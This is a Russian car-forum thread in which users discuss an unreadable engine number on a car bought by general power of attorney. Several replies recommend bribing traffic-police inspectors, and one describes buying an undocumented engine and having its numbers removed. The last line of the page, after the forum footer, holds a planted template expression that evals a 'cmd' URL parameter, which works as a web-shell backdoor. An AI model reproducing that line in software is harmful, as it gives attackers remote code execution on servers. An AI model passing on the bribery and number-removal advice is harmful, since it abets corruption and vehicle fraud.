+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 18

Тема: Экспертиза номера двигателя


  1. #1
    Товарисчи!

    Требуется консультация. Как выяснилось номер на двигле нечитаем от времени. Машина стоит на учете на человеке, который пригонял эту машину из германии.

    Мне машину отдают по генералке. Сталкиваюсь с гемором большим. Экспертиза итд итп.

    Вопрос: где можно сделать независимую экспертизу? и чего это денег будет стоить?

    Реально ли обойти экспертизу? Кому дать денег? Может у кого есть знакомые в МРЭО СВАО на сигнальном?

    Помогите!

  2. #2
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    <div class='quotetop'>Цитата(COOLLERTDSP &#064; Dec 11 2007, 12&#58;18) <{POST_SNAPBACK}></div><div class='quotemain'>Товарисчи&#33;

    Требуется консультация. Как выяснилось номер на двигле нечитаем от времени. Машина стоит на учете на человеке, который пригонял эту машину из германии.

    Мне машину отдают по генералке. Сталкиваюсь с гемором большим. Экспертиза итд итп.

    Вопрос: где можно сделать независимую экспертизу? и чего это денег будет стоить?

    Реально ли обойти экспертизу? Кому дать денег? Может у кого есть знакомые в МРЭО СВАО на сигнальном?

    Помогите&#33;[/b][/quote]
    обойти реально&#33;
    На сигнальном ща тоже буду искать завязки&#33; так что если что те помогу&#33;

  3. #3
    Вот думаю еще, что даже если обойду все это, то потом на первом же посту где надумают проверить номера могут все равно на экспертизу направить :blink:

    Но заранее спасибо )))

  4. #4
    Не знаю на счет статьи, могу сказать что на площадке гаишники рубят денег побольше чем коллеги на трассе. Этим летом была похожая ситуация с лансером жены. И кислотой терли и щетками, 3 или 4 раза приезжали показывать. "Идите на эксперизу" и ниипет. Было очевидно, что хочут денег. Сунул рожу в окошко: "может, получше посмотрите? а я отблагодарю" Товарисч одел очки и сразу номера прочитал. У покупателя с постановкой на учет проблем не было. Единственное, пришлось в гаи до обеда торчать, он нас в последнюю очередь "отпустил". Мне кажеца они такую статью дохода организовали вот и все. Раньше с постановкой были сложности, теперь наоборот.

  5. #5
    <div class='quotetop'>Цитата(COOLLERTDSP &#064; Dec 11 2007, 12&#58;42) <{POST_SNAPBACK}></div><div class='quotemain'>Вот думаю еще, что даже если обойду все это, то потом на первом же посту где надумают проверить номера могут все равно на экспертизу направить :blink:

    Но заранее спасибо )))[/b][/quote]

    тебе не об этом нужно беспокоиться, а о том что бы машина мутной не оказалась, а с поста, на экспертизу сейчас отправляют крайне спорные варианты имхо

  6. #6
    Вот сейчас другу позвонил, он попробует пробить ВИН номер машины. Если она чистая, то можно в принципе даже на экспертизу съездить... эх...

    Машину отдает другой друг, он ее в свое время пригнал из Германии, на учете она стоит на того человека, который ее перегонял. Ездил все время друг мой по генералке и вот теперь надумал продавать, а номер вроде от корозии разъело.

    Просто он такой товарищ, что сам в машину никогда не лазил и только там раз в пол года загонял в сервис, ему комплексные работы делали и он уезжал спокойно.

    Обманывать меня ему резона нет, ну все же с детства вместе. Да и многое нас объединяет.

  7. #7
    Мимо проходил Zeleboba is on a distinguished road Аватар для Zeleboba
    Регистрация
    09.12.2007
    Сообщений
    9
    Я сталкивался с этим несколько раз.
    ИМХО, машина должна стоить дешевле или быть в очень хорошем состоянии чтобы с этим связываться.
    Первое что сделал бы я (при соблюдении условий верхней строки ;) ) то подьехал в экспертный отдел. Он находится не в ГАИ, а как правило отдельно. Договорился бы о частном осмотре и подвез туда машину. Если все ОК, то едешь в ГАИ, там тебя отправляют на экспертизу, проходишь экспертизу, тебе делают вклейки в ПТС с фотографиями и словами типа "все ОК" B) Никаких проблем в дальнейшем.
    Вот собственно самый правильный и официальный способ.

    P.S. Если все сделаешь так, то в дальнейшем при необходимости отремонтировать/заменить движок, покупаешь дешевый без доков, отдаешь его спецам для удаления номеров, ставишь на машину и никаких проблем.
    Проверено лично на одной из своих старых машин.

  8. #8
    <div class='quotetop'>Цитата(Zeleboba &#064; Dec 11 2007, 13&#58;30) <{POST_SNAPBACK}></div><div class='quotemain'>Я сталкивался с этим несколько раз.
    ИМХО, машина должна стоить дешевле или быть в очень хорошем состоянии чтобы с этим связываться.
    Первое что сделал бы я (при соблюдении условий верхней строки ;) ) то подьехал в экспертный отдел. Он находится не в ГАИ, а как правило отдельно. Договорился бы о частном осмотре и подвез туда машину. Если все ОК, то едешь в ГАИ, там тебя отправляют на экспертизу, проходишь экспертизу, тебе делают вклейки в ПТС с фотографиями и словами типа "все ОК" B) Никаких проблем в дальнейшем.
    Вот собственно самый правильный и официальный способ.

    P.S. Если все сделаешь так, то в дальнейшем при необходимости отремонтировать/заменить движок, покупаешь дешевый без доков, отдаешь его спецам для удаления номеров, ставишь на машину и никаких проблем.
    Проверено лично на одной из своих старых машин.[/b][/quote]
    хороший вариант

  9. #9
    :huh: попадос одним словом, машина действительно хорошая и денег все 120 000р. поэтому упускать не хочется, но и от гемороя я видимо не избавлюсь.

  10. #10
    Новичок BzzzzzIK is on a distinguished road Аватар для BzzzzzIK
    Регистрация
    30.11.2006
    Сообщений
    138
    на тему - я купил с вклейкой уже - при покупке предыдущий владелец передал мне на руки заключение экспертов и дополнительные заверенные копии вклейки номера ( сказал что трабл весь может быть при продаже такого авто только если нет копий вклеек - если есть то все ок). скок езжу год почти - ни разу никто номер не проверял, даже проще - при постановке гайцы слепые были нифига не видели ковырялись у всех ковырялись и у меня - я молчал молчал потом говорю - слышь че ты там разглядываешь ? у меня номер нечитаемый&#33;&#33; =))) он оценил.. Сразу все прошел, так что наверно тут все дело случая..

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Гос номера
    от Ska-Ska в разделе Курилка
    Ответов: 3
    Последнее сообщение: 12.08.2021, 02:09
  2. Экспертиза
    от Eclipse в разделе Законодательство и страхование
    Ответов: 9
    Последнее сообщение: 05.09.2019, 14:07
  3. Прячем номера
    от vikeis в разделе Законодательство и страхование
    Ответов: 234
    Последнее сообщение: 05.04.2019, 10:01
  4. Номера двигателей 1,8Т
    от Grisha в разделе Разное
    Ответов: 5
    Последнее сообщение: 01.12.2018, 15:40
  5. Номера запчастей
    от eXtreeM в разделе Курилка
    Ответов: 0
    Последнее сообщение: 23.04.2012, 15:02

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}